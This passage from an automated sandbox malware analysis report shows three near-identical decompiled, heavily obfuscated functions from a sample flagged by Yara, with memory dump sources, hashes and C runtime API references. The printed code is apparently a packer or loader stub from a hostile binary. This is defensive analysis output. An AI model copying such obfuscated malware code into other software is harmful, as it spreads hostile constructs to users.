                    				void* _t299;
                    				void* _t300;
                    				intOrPtr* _t303;
                    				intOrPtr* _t304;
                    				void* _t305;
                    
                    				_t295 = __esi;
                    				_t181 = __edi;
                    				_t177 = __edx;
                    				asm("sbb ebx, ebp");
                    				_push(0x2224);
                    				_t80 =  *_t303;
                    				_t304 = _t303 + 4;
                    				_push(0x288);
                    				_t171 =  *_t304;
                    				_t305 = _t304 + 4;
                    				_t81 = E00401134(_t80, __edi, __eflags, __fp0);
                    				asm("sbb ah, [ebx+0x5f5f5f5e]");
                    				asm("aam 0x2");
                    				_push(_t181);
                    				asm("aaa");
                    				 *(_t81 - 0x15) =  *(_t81 - 0x15) ^ _t177;
                    				asm("daa");
                    				asm("aaa");
                    				asm("popad");
                    				_t172 = _t171 -  *((intOrPtr*)((_t295 ^  *0x46) + 9));
                    				_t88 =  *0x9fda470c;
                    				asm("fiadd dword [ebp+ebx*2+0x5f]");
                    				_t191 = _t88;
                    				asm("fcomp qword [ecx-0x484a4ba9]");
                    				_pop(_t192);
                    				asm("sbb bl, [edi+0x18]");
                    				_t195 = ss;
                    				_t197 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t202 = ss;
                    				_pop(_t204);
                    				_pop(_t205);
                    				_pop(_t206);
                    				asm("sbb al, 0x5f");
                    				_pop(_t208);
                    				_t142 = (( *((intOrPtr*)(_t191 + 0x5f)) +  *((intOrPtr*)(_t192 + 0xd)) |  *(_t195 + 0xd)) +  *((intOrPtr*)(_t197 + 0x12)) +  *((intOrPtr*)(_t202 + 0xc)) -  *((intOrPtr*)(_t204 + 0x3a)) ^  *(_t205 + 3)) -  *((intOrPtr*)(_t206 + 0x2d)) -  *((intOrPtr*)(_t208 + 0x1c));
                    				_pop(_t209);
                    				 *(_t209 + 0x31) =  *(_t209 + 0x31) ^ _t142;
                    				_pop(_t210);
                    				_t143 = _t142 -  *((intOrPtr*)(_t210 + 0x2d));
                    				_pop(_t211);
                    				 *(_t211 + 0x33) =  *(_t211 + 0x33) ^ _t143;
                    				_pop(_t213);
                    				_t144 = _t143 +  *((intOrPtr*)(_t213 + 0x1a));
                    				_pop(_t214);
                    				 *(_t214 + 0x2a) =  *(_t214 + 0x2a) ^ _t144;
                    				_pop(_t215);
                    				asm("sbb ebx, [edi+0x1a]");
                    				_t222 = ss;
                    				asm("sbb bl, [edi+0x18]");
                    				_t225 = ss;
                    				_t93 = (_t88 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
                    				_t227 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t232 = ss;
                    				_t149 = ((_t144 ^  *(_t215 + 3)) +  *((intOrPtr*)(_t222 + 0xd)) |  *(_t225 + 0xd)) +  *((intOrPtr*)(_t227 + 0x12)) +  *((intOrPtr*)(_t232 + 0xc));
                    				_pop(_t234);
                    				do {
                    					_pop(_t235);
                    					_pop(_t236);
                    					asm("sbb al, 0x5f");
                    					_pop(_t238);
                    					_t153 = (_t149 -  *((intOrPtr*)(_t234 + 0x3a)) ^  *(_t235 + 3)) -  *((intOrPtr*)(_t236 + 0x2d)) -  *((intOrPtr*)(_t238 + 0x1c));
                    					_pop(_t239);
                    					 *(_t239 + 0x31) =  *(_t239 + 0x31) ^ _t153;
                    					_pop(_t240);
                    					_t154 = _t153 -  *((intOrPtr*)(_t240 + 0x2d));
                    					_pop(_t241);
                    					 *(_t241 + 0x33) =  *(_t241 + 0x33) ^ _t154;
                    					_pop(_t243);
                    					_pop(_t244);
                    					 *(_t244 + 0x2a) =  *(_t244 + 0x2a) ^ _t154 +  *((intOrPtr*)(_t243 + 0x1a));
                    					asm("sbb al, 0x5f");
                    					_t98 = _t93 - 0xffffffffcea0c600 | 0x5f;
                    					_push(ss);
                    					asm("popad");
                    					asm("aaa");
                    					_t149 = _t98;
                    					_pop(_t234);
                    					_t93 = _t98 ^ 0x670ca01f;
                    					asm("salc");
                    					asm("sbb dh, [edi+0xca00f09]");
                    				} while (_t93 > 0);
                    				_t178 = _t177 -  *((intOrPtr*)(_t234 + 0xd9b0ad2));
                    				asm("wait");
                    				 *_t178 =  *_t178 << _t172;
                    				asm("sbb [ebx+0x5f], bl");
                    				asm("salc");
                    				asm("sbb [edi-0x68], dl");
                    				asm("sbb [ebx+0x1f], dl");
                    				asm("sbb [edi+0x5f], cl");
                    				asm("sbb [ebx+0x5f], cl");
                    				 *0xbb0ad256 =  *0xbb0ad256 | _t178;
                    				asm("ficomp dword [edi+0x5f99da50]");
                    				asm("ror byte [edx], cl");
                    				_pop(_t299);
                    				asm("iretd");
                    				asm("stosd");
                    				asm("ror byte [edx], cl");
                    				asm("stosd");
                    				asm("ficomp dword [edi+0x22dc262a]");
                    				_t300 = _t299 -  *((intOrPtr*)(_t305 + (_t178 &  *0xFFFFFFFFFCDB506C) * 8));
                    				asm("sbb ch, [ebx-0x29b4e02c]");
                    				asm("sbb ah, [edi+0x2264a06e]");
                    				asm("cmpsd");
                    				asm("ror byte [edx], cl");
                    				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
                    				asm("retf");
                    				asm("fcomp qword [edx]");
                    				asm("scasd");
                    				asm("ror byte [edx], cl");
                    				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
                    				asm("retf");
                    				asm("ficomp dword [edi+0x22dc482a]");
                    				asm("sbb ch, [edi+0xf4f1fd2]");
                    				asm("pushfd");
                    				asm("arpl [eax+0xca0bb2a], sp");
                    				asm("arpl sp, bx");
                    				asm("cdq");
                    				 *0x5f5f5f5f =  *0x1a9858b4;
                    				 *(_t300 + 0x37900d8d) =  *(_t300 + 0x37900d8d) & 0x0000007b;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d59f6f3162041bbcf6c9ee8dfae9598855c33c47c8c2a475590d109c414916c
                    • Instruction ID: eada4f50804c9ab052ce293b875910e2d91b3a8e4358feee3b03f6b57ddeb38e
                    • Opcode Fuzzy Hash: 1d59f6f3162041bbcf6c9ee8dfae9598855c33c47c8c2a475590d109c414916c
                    • Instruction Fuzzy Hash: 7051532F35A6C2EAC7018A7EF9958DDBF20FDC663530856B7C28499C43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3d759a7e83d754e5d75c426be1be6dd45823257f2e3de362d6cd14e253a64b44
                    • Instruction ID: 4200c58afab6172b6b9ba7c74e368917ef170b3e62b14321b2695e222bff24c2
                    • Opcode Fuzzy Hash: 3d759a7e83d754e5d75c426be1be6dd45823257f2e3de362d6cd14e253a64b44
                    • Instruction Fuzzy Hash: 6451532F35A6C2EAC7458A7EF9958DDBF20FDC663530856B7C28489C43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E00402209(signed int __eax, signed char __edx, void* __edi, signed int __esi, void* __fp0) {
                    				void* _t82;
                    				signed char _t89;
                    				signed int _t94;
                    				signed int _t99;
                    				signed char _t143;
                    				signed char _t144;
                    				signed char _t145;
                    				void* _t150;
                    				signed char _t154;
                    				signed char _t155;
                    				intOrPtr _t172;
                    				signed char _t173;
                    				signed char _t178;
                    				signed char _t179;
                    				void* _t182;
                    				void* _t192;
                    				void* _t193;
                    				void* _t196;
                    				void* _t198;
                    				void* _t203;
                    				void* _t205;
                    				void* _t206;
                    				void* _t207;
                    				void* _t209;
                    				void* _t210;
                    				void* _t211;
                    				void* _t212;
                    				void* _t214;
                    				void* _t215;
                    				void* _t216;
                    				void* _t223;
                    				void* _t226;
                    				void* _t228;
                    				void* _t233;
                    				void* _t235;
                    				void* _t236;
                    				void* _t237;
                    				void* _t239;
                    				void* _t240;
                    				void* _t241;
                    				void* _t242;
                    				void* _t244;
                    				void* _t245;
                    				signed int _t296;
                    				void* _t300;
                    				void* _t301;
                    				intOrPtr* _t304;
                    				void* _t305;
                    				signed int _t307;
                    
                    				_t296 = __esi;
                    				_t182 = __edi;
                    				_t178 = __edx;
                    				_t81 = __eax ^ 0x68c95800;
                    				_t307 = __eax ^ 0x68c95800;
                    				_push(0x288);
                    				_t172 =  *_t304;
                    				_t305 = _t304 + 4;
                    				_t82 = E00401134(_t81, __edi, _t307, __fp0);
                    				asm("sbb ah, [ebx+0x5f5f5f5e]");
                    				asm("aam 0x2");
                    				_push(_t182);
                    				asm("aaa");
                    				 *(_t82 - 0x15) =  *(_t82 - 0x15) ^ _t178;
                    				asm("daa");
                    				asm("aaa");
                    				asm("popad");
                    				_t173 = _t172 -  *((intOrPtr*)((_t296 ^  *0x46) + 9));
                    				_t89 =  *0x9fda470c;
                    				asm("fiadd dword [ebp+ebx*2+0x5f]");
                    				_t192 = _t89;
                    				asm("fcomp qword [ecx-0x484a4ba9]");
                    				_pop(_t193);
                    				asm("sbb bl, [edi+0x18]");
                    				_t196 = ss;
                    				_t198 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t203 = ss;
                    				_pop(_t205);
                    				_pop(_t206);
                    				_pop(_t207);
                    				asm("sbb al, 0x5f");
                    				_pop(_t209);
                    				_t143 = (( *((intOrPtr*)(_t192 + 0x5f)) +  *((intOrPtr*)(_t193 + 0xd)) |  *(_t196 + 0xd)) +  *((intOrPtr*)(_t198 + 0x12)) +  *((intOrPtr*)(_t203 + 0xc)) -  *((intOrPtr*)(_t205 + 0x3a)) ^  *(_t206 + 3)) -  *((intOrPtr*)(_t207 + 0x2d)) -  *((intOrPtr*)(_t209 + 0x1c));
                    				_pop(_t210);
                    				 *(_t210 + 0x31) =  *(_t210 + 0x31) ^ _t143;
                    				_pop(_t211);
                    				_t144 = _t143 -  *((intOrPtr*)(_t211 + 0x2d));
                    				_pop(_t212);
                    				 *(_t212 + 0x33) =  *(_t212 + 0x33) ^ _t144;
                    				_pop(_t214);
                    				_t145 = _t144 +  *((intOrPtr*)(_t214 + 0x1a));
                    				_pop(_t215);
                    				 *(_t215 + 0x2a) =  *(_t215 + 0x2a) ^ _t145;
                    				_pop(_t216);
                    				asm("sbb ebx, [edi+0x1a]");
                    				_t223 = ss;
                    				asm("sbb bl, [edi+0x18]");
                    				_t226 = ss;
                    				_t94 = (_t89 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
                    				_t228 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t233 = ss;
                    				_t150 = ((_t145 ^  *(_t216 + 3)) +  *((intOrPtr*)(_t223 + 0xd)) |  *(_t226 + 0xd)) +  *((intOrPtr*)(_t228 + 0x12)) +  *((intOrPtr*)(_t233 + 0xc));
                    				_pop(_t235);
                    				do {
                    					_pop(_t236);
                    					_pop(_t237);
                    					asm("sbb al, 0x5f");
                    					_pop(_t239);
                    					_t154 = (_t150 -  *((intOrPtr*)(_t235 + 0x3a)) ^  *(_t236 + 3)) -  *((intOrPtr*)(_t237 + 0x2d)) -  *((intOrPtr*)(_t239 + 0x1c));
                    					_pop(_t240);
                    					 *(_t240 + 0x31) =  *(_t240 + 0x31) ^ _t154;
                    					_pop(_t241);
                    					_t155 = _t154 -  *((intOrPtr*)(_t241 + 0x2d));
                    					_pop(_t242);
                    					 *(_t242 + 0x33) =  *(_t242 + 0x33) ^ _t155;
                    					_pop(_t244);
                    					_pop(_t245);
                    					 *(_t245 + 0x2a) =  *(_t245 + 0x2a) ^ _t155 +  *((intOrPtr*)(_t244 + 0x1a));
                    					asm("sbb al, 0x5f");
                    					_t99 = _t94 - 0xffffffffcea0c600 | 0x5f;
                    					_push(ss);
                    					asm("popad");
                    					asm("aaa");
                    					_t150 = _t99;
                    					_pop(_t235);
                    					_t94 = _t99 ^ 0x670ca01f;
                    					asm("salc");
                    					asm("sbb dh, [edi+0xca00f09]");
                    				} while (_t94 > 0);
                    				_t179 = _t178 -  *((intOrPtr*)(_t235 + 0xd9b0ad2));
                    				asm("wait");
                    				 *_t179 =  *_t179 << _t173;
                    				asm("sbb [ebx+0x5f], bl");
                    				asm("salc");
                    				asm("sbb [edi-0x68], dl");
                    				asm("sbb [ebx+0x1f], dl");
                    				asm("sbb [edi+0x5f], cl");
                    				asm("sbb [ebx+0x5f], cl");
                    				 *0xbb0ad256 =  *0xbb0ad256 | _t179;
                    				asm("ficomp dword [edi+0x5f99da50]");
                    				asm("ror byte [edx], cl");
                    				_pop(_t300);
                    				asm("iretd");
                    				asm("stosd");
                    				asm("ror byte [edx], cl");
                    				asm("stosd");
                    				asm("ficomp dword [edi+0x22dc262a]");
                    				_t301 = _t300 -  *((intOrPtr*)(_t305 + (_t179 &  *0xFFFFFFFFFCDB506C) * 8));
                    				asm("sbb ch, [ebx-0x29b4e02c]");
                    				asm("sbb ah, [edi+0x2264a06e]");
                    				asm("cmpsd");
                    				asm("ror byte [edx], cl");
                    				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
                    				asm("retf");
                    				asm("fcomp qword [edx]");
                    				asm("scasd");
                    				asm("ror byte [edx], cl");
                    				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
                    				asm("retf");
                    				asm("ficomp dword [edi+0x22dc482a]");
                    				asm("sbb ch, [edi+0xf4f1fd2]");
                    				asm("pushfd");
                    				asm("arpl [eax+0xca0bb2a], sp");
                    				asm("arpl sp, bx");
                    				asm("cdq");
                    				 *0x5f5f5f5f =  *0x1a9858b4;
                    				 *(_t301 + 0x37900d8d) =  *(_t301 + 0x37900d8d) & 0x0000007b;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 26460328608f7996706db2db09f01a22d471f1a8fd7a556d5edc8650d9f20fe6
                    • Instruction ID: 81100b3b585ab1a031ac1d8c25657d12bc4d4fa56ec599035ca8a75da73c802a
                    • Opcode Fuzzy Hash: 26460328608f7996706db2db09f01a22d471f1a8fd7a556d5edc8650d9f20fe6
                    • Instruction Fuzzy Hash: 1151432F35A7C2EAC7018A7EF9958DDBF20FDC663530856B7C28489D43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fc0769ee71a88b49e604354a2a996783d7664fabe88c69128c88b2d9de7d279d
                    • Instruction ID: 4ff0681706264dd7cdb44e392b6edd6d152f0c39cb4114cfb1de216dc6c82aa7
                    • Opcode Fuzzy Hash: fc0769ee71a88b49e604354a2a996783d7664fabe88c69128c88b2d9de7d279d
                    • Instruction Fuzzy Hash: 8A51432F35A6C2EAC7058A7EF9958DDBF20FDC663530856B7C28489D43C711A06BD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 21%
                    			E0040221B(signed int __eax, signed char __edx, void* __edi, signed int __esi, void* __fp0) {
                    				void* _t83;
                    				signed char _t90;
                    				signed int _t95;
                    				signed int _t100;
                    				signed char _t144;
                    				signed char _t145;
                    				signed char _t146;
                    				void* _t151;
                    				signed char _t155;
                    				signed char _t156;
                    				intOrPtr _t173;
                    				signed char _t174;
                    				signed char _t179;
                    				signed char _t180;
                    				void* _t183;
                    				void* _t193;
                    				void* _t194;
                    				void* _t197;
                    				void* _t199;
                    				void* _t204;
                    				void* _t206;
                    				void* _t207;
                    				void* _t208;
                    				void* _t210;
                    				void* _t211;
                    				void* _t212;
                    				void* _t213;
                    				void* _t215;
                    				void* _t216;
                    				void* _t217;
                    				void* _t224;
                    				void* _t227;
                    				void* _t229;
                    				void* _t234;
                    				void* _t236;
                    				void* _t237;
                    				void* _t238;
                    				void* _t240;
                    				void* _t241;
                    				void* _t242;
                    				void* _t243;
                    				void* _t245;
                    				void* _t246;
                    				signed int _t297;
                    				void* _t301;
                    				void* _t302;
                    				intOrPtr* _t305;
                    				void* _t306;
                    				signed int _t308;
                    
                    				_t297 = __esi;
                    				_t183 = __edi;
                    				_t179 = __edx;
                    				_t308 = __eax & 0x000000eb;
                    				_push(0x288);
                    				_t173 =  *_t305;
                    				_t306 = _t305 + 4;
                    				_t83 = E00401134(__eax, __edi, _t308, __fp0);
                    				asm("sbb ah, [ebx+0x5f5f5f5e]");
                    				asm("aam 0x2");
                    				_push(_t183);
                    				asm("aaa");
                    				 *(_t83 - 0x15) =  *(_t83 - 0x15) ^ _t179;
                    				asm("daa");
                    				asm("aaa");
                    				asm("popad");
                    				_t174 = _t173 -  *((intOrPtr*)((_t297 ^  *0x46) + 9));
                    				_t90 =  *0x9fda470c;
                    				asm("fiadd dword [ebp+ebx*2+0x5f]");
                    				_t193 = _t90;
                    				asm("fcomp qword [ecx-0x484a4ba9]");
                    				_pop(_t194);
                    				asm("sbb bl, [edi+0x18]");
                    				_t197 = ss;
                    				_t199 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t204 = ss;
                    				_pop(_t206);
                    				_pop(_t207);
                    				_pop(_t208);
                    				asm("sbb al, 0x5f");
                    				_pop(_t210);
                    				_t144 = (( *((intOrPtr*)(_t193 + 0x5f)) +  *((intOrPtr*)(_t194 + 0xd)) |  *(_t197 + 0xd)) +  *((intOrPtr*)(_t199 + 0x12)) +  *((intOrPtr*)(_t204 + 0xc)) -  *((intOrPtr*)(_t206 + 0x3a)) ^  *(_t207 + 3)) -  *((intOrPtr*)(_t208 + 0x2d)) -  *((intOrPtr*)(_t210 + 0x1c));
                    				_pop(_t211);
                    				 *(_t211 + 0x31) =  *(_t211 + 0x31) ^ _t144;
                    				_pop(_t212);
                    				_t145 = _t144 -  *((intOrPtr*)(_t212 + 0x2d));
                    				_pop(_t213);
                    				 *(_t213 + 0x33) =  *(_t213 + 0x33) ^ _t145;
                    				_pop(_t215);
                    				_t146 = _t145 +  *((intOrPtr*)(_t215 + 0x1a));
                    				_pop(_t216);
                    				 *(_t216 + 0x2a) =  *(_t216 + 0x2a) ^ _t146;
                    				_pop(_t217);
                    				asm("sbb ebx, [edi+0x1a]");
                    				_t224 = ss;
                    				asm("sbb bl, [edi+0x18]");
                    				_t227 = ss;
                    				_t95 = (_t90 | 0x0000005f) - 0xffffffffcea0c600 | 0x5f;
                    				_t229 = es;
                    				asm("sbb al, 0x5f");
                    				ss = ds;
                    				asm("adc [edi+0x1a], ebx");
                    				_t234 = ss;
                    				_t151 = ((_t146 ^  *(_t217 + 3)) +  *((intOrPtr*)(_t224 + 0xd)) |  *(_t227 + 0xd)) +  *((intOrPtr*)(_t229 + 0x12)) +  *((intOrPtr*)(_t234 + 0xc));
                    				_pop(_t236);
                    				do {
                    					_pop(_t237);
                    					_pop(_t238);
                    					asm("sbb al, 0x5f");
                    					_pop(_t240);
                    					_t155 = (_t151 -  *((intOrPtr*)(_t236 + 0x3a)) ^  *(_t237 + 3)) -  *((intOrPtr*)(_t238 + 0x2d)) -  *((intOrPtr*)(_t240 + 0x1c));
                    					_pop(_t241);
                    					 *(_t241 + 0x31) =  *(_t241 + 0x31) ^ _t155;
                    					_pop(_t242);
                    					_t156 = _t155 -  *((intOrPtr*)(_t242 + 0x2d));
                    					_pop(_t243);
                    					 *(_t243 + 0x33) =  *(_t243 + 0x33) ^ _t156;
                    					_pop(_t245);
                    					_pop(_t246);
                    					 *(_t246 + 0x2a) =  *(_t246 + 0x2a) ^ _t156 +  *((intOrPtr*)(_t245 + 0x1a));
                    					asm("sbb al, 0x5f");
                    					_t100 = _t95 - 0xffffffffcea0c600 | 0x5f;
                    					_push(ss);
                    					asm("popad");
                    					asm("aaa");
                    					_t151 = _t100;
                    					_pop(_t236);
                    					_t95 = _t100 ^ 0x670ca01f;
                    					asm("salc");
                    					asm("sbb dh, [edi+0xca00f09]");
                    				} while (_t95 > 0);
                    				_t180 = _t179 -  *((intOrPtr*)(_t236 + 0xd9b0ad2));
                    				asm("wait");
                    				 *_t180 =  *_t180 << _t174;
                    				asm("sbb [ebx+0x5f], bl");
                    				asm("salc");
                    				asm("sbb [edi-0x68], dl");
                    				asm("sbb [ebx+0x1f], dl");
                    				asm("sbb [edi+0x5f], cl");
                    				asm("sbb [ebx+0x5f], cl");
                    				 *0xbb0ad256 =  *0xbb0ad256 | _t180;
                    				asm("ficomp dword [edi+0x5f99da50]");
                    				asm("ror byte [edx], cl");
                    				_pop(_t301);
                    				asm("iretd");
                    				asm("stosd");
                    				asm("ror byte [edx], cl");
                    				asm("stosd");
                    				asm("ficomp dword [edi+0x22dc262a]");
                    				_t302 = _t301 -  *((intOrPtr*)(_t306 + (_t180 &  *0xFFFFFFFFFCDB506C) * 8));
                    				asm("sbb ch, [ebx-0x29b4e02c]");
                    				asm("sbb ah, [edi+0x2264a06e]");
                    				asm("cmpsd");
                    				asm("ror byte [edx], cl");
                    				 *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) =  *(( *0x5f5fcfcc - 0x0000003c ^ 0x355f355f) - 0x335f44d6) |  *0x5f5fcfcc - 0x0000003c ^ 0x355f355f;
                    				asm("retf");
                    				asm("fcomp qword [edx]");
                    				asm("scasd");
                    				asm("ror byte [edx], cl");
                    				 *( *0x5f35af2a - 0x335f44d6) =  *( *0x5f35af2a - 0x335f44d6) |  *0x5f35af2a;
                    				asm("retf");
                    				asm("ficomp dword [edi+0x22dc482a]");
                    				asm("sbb ch, [edi+0xf4f1fd2]");
                    				asm("pushfd");
                    				asm("arpl [eax+0xca0bb2a], sp");
                    				asm("arpl sp, bx");
                    				asm("cdq");
                    				 *0x5f5f5f5f =  *0x1a9858b4;
                    				 *(_t302 + 0x37900d8d) =  *(_t302 + 0x37900d8d) & 0x0000007b;
                    			}

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 43f15bd3062a4760c481f29c73abec842921584a995323407381a9c6276da2ee
                    • Instruction ID: 8d9ad5fc92841c5ff350025d079413b2a1f020c5f49b95558387f87c6b5b2f86
                    • Opcode Fuzzy Hash: 43f15bd3062a4760c481f29c73abec842921584a995323407381a9c6276da2ee
                    • Instruction Fuzzy Hash: EB51432F35A6C2EAC7058E7EF9958DDBF20FDC66353085677C28489D43C711A0ABD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d4a724cb870bcb18da757ab44d0a1e7f8e07ac8f8118f6b51f2ac268e752a64
                    • Instruction ID: cfbbe9443ec8a0a2100398618d48eb4f7df5a37ed4487c56a580f45ab1c896d0
                    • Opcode Fuzzy Hash: 8d4a724cb870bcb18da757ab44d0a1e7f8e07ac8f8118f6b51f2ac268e752a64
                    • Instruction Fuzzy Hash: 9051412F35A6C2EAC7058E7EF9958DDBF20FDC66353085677C28489D43C711A0ABD6A0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8c4a1b41f7ffe6c34f8868a4d146c2a895fd91472b977c83164233cef36a9efb
                    • Instruction ID: c842fcc63f07856b9123f6bc5472d278ca1dc6043060281b8ef7a5d9e1871927
                    • Opcode Fuzzy Hash: 8c4a1b41f7ffe6c34f8868a4d146c2a895fd91472b977c83164233cef36a9efb
                    • Instruction Fuzzy Hash: D731255284E2C25FC73357704DAE9EBBF74A86324474E41DBD0D19B5E3D2A8880BD39A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Offset: 00652000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_652000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: b956a75e1d9b5c1294435be921c44c7570a880ce7947e71003949f52e35d7c6f
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 6E117C72340100AFEB44DE55DC81EA673EAEB88361B698169FD09CB312D676EC06C760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_600000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: 0d8b75db3329e727e2f298a538b10a5da1ac7c04e1debf53f6a48a6320adb0d8
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: FD01A7766406048FEF25CF64C804BEB33E6EF85315F4544E5D506973C2E774A9418B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B46C
                    • __isctype_l.LIBCMT ref: 0040B4DF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: Locale$UpdateUpdate::___isctype_l
                    • String ID: $$+$-$0$0
                    • API String ID: 2547950892-4042548909
                    • Opcode ID: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction ID: 97537141d6d2858a3edd09e828bcdb1ecb2a0de928e4cfbf47729112040edc5f
                    • Opcode Fuzzy Hash: 1d2ed6883e4ca65e4a166239b617743e04a1b9863ee11bc6d2853cc455e2acaa
                    • Instruction Fuzzy Hash: 3B71D270900249AADF25CF28C9557AB7BA0EF51358F2805BBE851B62D1C3398E91C7DE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: __fileno__flsbuf__flush__locking
                    • String ID:
                    • API String ID: 2259706978-0
                    • Opcode ID: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction ID: d9b0b9fd459113351f921aa778dd8b20b1cf5d34ba7c7a55e35930b3a3d7b7cc
                    • Opcode Fuzzy Hash: 6bde799d7cffcce2465a4719f02d4e34f410e9838aed0f3b52363691e32db9a3
                    • Instruction Fuzzy Hash: B1418272A006059BDB24AF65888459FBBB9EF80360B24C53EE865B72D0D778DD419B8C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.378507056.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
